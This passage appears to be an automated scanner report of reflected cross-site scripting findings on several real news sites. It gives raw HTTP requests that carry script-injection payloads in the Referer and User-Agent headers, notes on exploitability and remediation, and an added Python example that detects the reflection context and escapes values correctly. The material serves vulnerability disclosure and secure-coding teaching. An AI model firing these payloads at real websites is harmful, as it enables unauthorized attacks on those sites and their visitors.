Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /article2/0,1895,2135433,00.asp HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=83f60"><script>alert(1)</script>a4e90e3d887
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 658ec"-alert(1)-"c598543247b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Midmarket/Another-Phishing-Scam-Targets-Facebook-Users-165926/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=658ec"-alert(1)-"c598543247b
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0b40"><script>alert(1)</script>90695f5830c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c/a/Midmarket/Another-Phishing-Scam-Targets-Facebook-Users-165926/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e0b40"><script>alert(1)</script>90695f5830c
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf9d4"><script>alert(1)</script>10929f56639 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c/a/Midmarket/Facebook-Targeted-in-Spam-Scam-603252/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bf9d4"><script>alert(1)</script>10929f56639
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2eb2"-alert(1)-"5d00cdea555 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Midmarket/Facebook-Targeted-in-Spam-Scam-603252/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e2eb2"-alert(1)-"5d00cdea555
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1d23"-alert(1)-"2b095ae0922 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Security/Phishers-Increase-Abuse-of-Specific-TopLevel-Domains/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c1d23"-alert(1)-"2b095ae0922
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f94a5"><script>alert(1)</script>cc15a419565 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c/a/Security/Phishers-Increase-Abuse-of-Specific-TopLevel-Domains/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f94a5"><script>alert(1)</script>cc15a419565
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4a8c"-alert(1)-"35e1acee13 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet/policy/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c4a8c"-alert(1)-"35e1acee13
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:22 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:22 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=XN3FHZ1EQVL45QE1GHRSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32420
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c4a8c"-alert(1)-"35e1acee13"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b61a"-alert(1)-"740fef0d6c2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet/security/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1b61a"-alert(1)-"740fef0d6c2
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:22 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:22 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=2WWASGL3EQNA3QE1GHOSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32475
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1b61a"-alert(1)-"740fef0d6c2"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93b34"-alert(1)-"6baaf5739c4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet/social_network/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)93b34"-alert(1)-"6baaf5739c4
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:22 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:22 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=UTR3BG5LYRNZZQE1GHOSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32371
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)93b34"-alert(1)-"6baaf5739c4"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38f49"-alert(1)-"16257ad9e05 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for a JavaScript string literal (for example as \uXXXX escapes covering quotes, backslashes, angle brackets and line terminators); HTML-encoding alone does not help, because the contents of a script block are not HTML-decoded before the JavaScript parser sees them.
Request
GET /news/security/government/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)38f49"-alert(1)-"16257ad9e05
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:22 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:22 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=PJWSNHEL3ETJLQE1GHPSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32315

<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)38f49"-alert(1)-"16257ad9e05"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dac0"-alert(1)-"9c7391968ee was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the reflected data is submitted in the User-Agent header rather than in the URL or request body, this is not trivial to exploit against another user: on a navigation (the only kind of request whose response the browser renders as a page) the browser sets that header itself, and neither a link nor a web page can override it, so a crafted link alone does not deliver the payload. In the past, client-side technologies such as Flash offered ways of making another user's browser send a request with an arbitrary header; if such a technique is available against the victim's browser, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for a JavaScript string literal (for example as \uXXXX escapes covering quotes, backslashes, angle brackets and line terminators); HTML-encoding alone does not help, because the contents of a script block are not HTML-decoded before the JavaScript parser sees them.
Request
GET /news/software/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9dac0"-alert(1)-"9c7391968ee
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:20 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:20 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=XXBMOKBMOUXWJQE1GHRSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32149

<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9dac0"-alert(1)-"9c7391968ee"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c70b"-alert(1)-"02cef8199e2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the reflected data is submitted in the User-Agent header rather than in the URL or request body, this is not trivial to exploit against another user: on a navigation (the only kind of request whose response the browser renders as a page) the browser sets that header itself, and neither a link nor a web page can override it, so a crafted link alone does not deliver the payload. In the past, client-side technologies such as Flash offered ways of making another user's browser send a request with an arbitrary header; if such a technique is available against the victim's browser, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for a JavaScript string literal (for example as \uXXXX escapes covering quotes, backslashes, angle brackets and line terminators); HTML-encoding alone does not help, because the contents of a script block are not HTML-decoded before the JavaScript parser sees them.
Request
GET /author.asp HTTP/1.1
Host: www.internetevolution.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9c70b"-alert(1)-"02cef8199e2
Connection: close
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e381d"-alert(1)-"fdd973678 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the reflected data is submitted in the User-Agent header rather than in the URL or request body, this is not trivial to exploit against another user: on a navigation (the only kind of request whose response the browser renders as a page) the browser sets that header itself, and neither a link nor a web page can override it, so a crafted link alone does not deliver the payload. In the past, client-side technologies such as Flash offered ways of making another user's browser send a request with an arbitrary header; if such a technique is available against the victim's browser, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for a JavaScript string literal (for example as \uXXXX escapes covering quotes, backslashes, angle brackets and line terminators); HTML-encoding alone does not help, because the contents of a script block are not HTML-decoded before the JavaScript parser sees them.
Request
GET /author.asp?section_id=949&doc_id=190224&f_src=internetevolution_gnews HTTP/1.1
Host: www.internetevolution.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e381d"-alert(1)-"fdd973678
Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bdec"><script>alert(1)</script>bb0216f190a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the reflected data is submitted in the Referer header, this cannot be delivered with a crafted link alone: the browser sets that header itself, from the URL of the page the victim navigated from. An attacker who controls a page can therefore put the payload into that page's URL (for example its query string) and link from it to the vulnerable URL, but whether the full URL reaches a cross-site target depends on the referrer policy in force; current browser defaults send only the origin across sites unless the referring page opts into a more permissive policy. The older plugin-based techniques, such as those once available in Flash, for making another user's browser send arbitrary request headers would also apply where one is available. This limitation partially mitigates the impact of the vulnerability.
Request
GET /a/Voice-Data-and-IP/ab103dc2-d49c-444f-bd41-e7df70348eef.html HTTP/1.1
Host: www.itworldcanada.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2bdec"><script>alert(1)</script>bb0216f190a
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 3dcc9<script>alert(1)</script>d6bfd8eb8e8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the reflected data is submitted in the Referer header, this cannot be delivered with a crafted link alone: the browser sets that header itself, from the URL of the page the victim navigated from. An attacker who controls a page can therefore put the payload into that page's URL (for example its query string) and link from it to the vulnerable URL, but whether the full URL reaches a cross-site target depends on the referrer policy in force; current browser defaults send only the origin across sites unless the referring page opts into a more permissive policy. The older plugin-based techniques, such as those once available in Flash, for making another user's browser send arbitrary request headers would also apply where one is available. This limitation partially mitigates the impact of the vulnerability.
Request
GET /a/Voice-Data-and-IP/ab103dc2-d49c-444f-bd41-e7df70348eef.html HTTP/1.1
Host: www.itworldcanada.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3dcc9<script>alert(1)</script>d6bfd8eb8e8
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cc7d"><a>67a3810d154 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the reflected data is submitted in the Referer header, this cannot be delivered with a crafted link alone: the browser sets that header itself, from the URL of the page the victim navigated from. An attacker who controls a page can therefore put the payload into that page's URL (for example its query string) and link from it to the vulnerable URL, but whether the full URL reaches a cross-site target depends on the referrer policy in force; current browser defaults send only the origin across sites unless the referring page opts into a more permissive policy. The older plugin-based techniques, such as those once available in Flash, for making another user's browser send arbitrary request headers would also apply where one is available. This limitation partially mitigates the impact of the vulnerability.
Request
GET /blog/security/hundreds-of-high-profile-sites-unprotected-from-domain-hijacking/6248 HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: 9cc7d"><a>67a3810d154
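The checks behind these findings, as an added example that is not the scanner's code or any of the sites' code: given a response body and the canary payload that was sent, decide whether it came back unmodified and in which context it landed (the JavaScript string, double-quoted attribute and text-between-tags contexts reported in this section, including the zdnet attribute case where the scanner could not complete a proof of concept), then the context-specific encoding that the remediation notes ask for, checked against the same payloads. The sample bodies are constructed from the fragments shown above; the s.prop8 statement mirrors the analytics script in the informationweek responses.

```python
"""Added example, not the scanner's code: reproduce the checks behind the
findings above.  Given a response body and the canary that was sent, decide
whether it was echoed verbatim and which output context it landed in (the
three contexts seen in this section), then show the encoding the remediation
note calls for.  Sample bodies are constructed from fragments shown above."""
import re

# Constructed stand-ins for the responses above, trimmed to the sink.
JS_STRING_BODY = (
    '<html><head><script language="javascript">\n'
    'var found="false";\n'
    's.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; '
    'Windows NT 6.0)38f49"-alert(1)-"16257ad9e05"; s.prop9="";\n'
    '</script></head><body></body></html>'
)
ATTR_BODY = (
    '<html><body><a href="http://www.google.com/search?hl=en&q=2bdec">'
    '<script>alert(1)</script>bb0216f190a">back</a></body></html>'
)
TEXT_BODY = (
    '<html><body><p>You came from http://www.google.com/search?hl=en&q='
    '3dcc9<script>alert(1)</script>d6bfd8eb8e8</p></body></html>'
)
JS_PAYLOAD = '38f49"-alert(1)-"16257ad9e05'
ATTR_PAYLOAD = '2bdec"><script>alert(1)</script>bb0216f190a'
TEXT_PAYLOAD = '3dcc9<script>alert(1)</script>d6bfd8eb8e8'
UA_PAYLOAD = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' + JS_PAYLOAD


def _unescaped_count(text, quote):
    """Number of quote characters in text that are not backslash-escaped."""
    return len(re.findall(r'(?<!\\)' + re.escape(quote), text))


def reflection_context(body, payload):
    """None if the payload is not echoed verbatim; otherwise a label for the
    context it landed in, judged from the text before it.  A heuristic (JS
    comments and CDATA are ignored), like the scanner's own classification:
    confirm by hand before reporting."""
    idx = body.find(payload)
    if idx < 0:
        return None
    before = body[:idx]
    lower = before.lower()
    if lower.rfind('<script') > lower.rfind('</script'):
        # Inside an open script element: an odd number of unescaped quotes
        # since it opened means the payload sits inside a string literal.
        script = before[lower.rfind('<script'):]
        if _unescaped_count(script, '"') % 2:
            return 'js-string-dq'
        if _unescaped_count(script, "'") % 2:
            return 'js-string-sq'
        return 'js-code'
    if before.rfind('<') > before.rfind('>'):
        # Inside a tag that has not been closed yet.
        tag = before[before.rfind('<'):]
        return 'html-attr-dq' if tag.count('"') % 2 else 'html-tag'
    return 'html-text'


def js_string_escape(value):
    """Encode value for a double-quoted JavaScript string literal in an inline
    <script>.  Everything outside a small safe set becomes a \\uXXXX escape, so
    neither the JS parser (quotes, backslash, line terminators) nor the HTML
    parser (a literal </script>) can read syntax out of it.  HTML-encoding
    instead would not help: script content is not HTML-decoded."""
    out = []
    for ch in value:
        cp = ord(ch)
        if (ch.isalnum() and cp < 0x80) or ch in ' .,;:_-()':
            out.append(ch)
        elif cp > 0xFFFF:  # outside the BMP: emit a UTF-16 surrogate pair
            cp -= 0x10000
            out.append('\\u%04x\\u%04x' % (0xD800 + (cp >> 10), 0xDC00 + (cp & 0x3FF)))
        else:
            out.append('\\u%04x' % cp)
    return ''.join(out)


def render_prop8_vulnerable(user_agent):
    """The pattern seen above: the header value is concatenated in raw."""
    return 's.prop8="174.121.222.18 | %s";' % user_agent


def render_prop8_fixed(user_agent):
    """The same statement with the value encoded for its context."""
    return 's.prop8="174.121.222.18 | %s";' % js_string_escape(user_agent)


_ONE_LITERAL = re.compile(r's\.prop8="((?:[^"\\]|\\.)*)";')


def is_single_string_statement(stmt):
    """True if stmt is exactly  s.prop8="<literal>";  with one double-quoted
    literal (escapes allowed) and no raw '<' for the HTML parser to act on."""
    m = _ONE_LITERAL.fullmatch(stmt)
    return bool(m) and '<' not in m.group(1)


if __name__ == '__main__':
    for name, body, payload in (('JS string', JS_STRING_BODY, JS_PAYLOAD),
                                ('HTML attribute', ATTR_BODY, ATTR_PAYLOAD),
                                ('HTML text', TEXT_BODY, TEXT_PAYLOAD)):
        print('%-14s -> %s' % (name, reflection_context(body, payload)))
    print('vulnerable:', render_prop8_vulnerable(UA_PAYLOAD))
    print('fixed:     ', render_prop8_fixed(UA_PAYLOAD))
```

The classifier is deliberately as blunt as the scanner's own wording ("copied into a JavaScript string which is encapsulated in double quotation marks"); the point of the second half is that the fix has to match the context the classifier reports. A value that merely has its quotes neutralised is still unsafe in a script block, because a literal `</script>` in it ends the element for the HTML parser before the JavaScript parser ever runs, which is why the escaper treats `<` as hostile too.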
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5040"-alert(1)-"a2516965a67 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
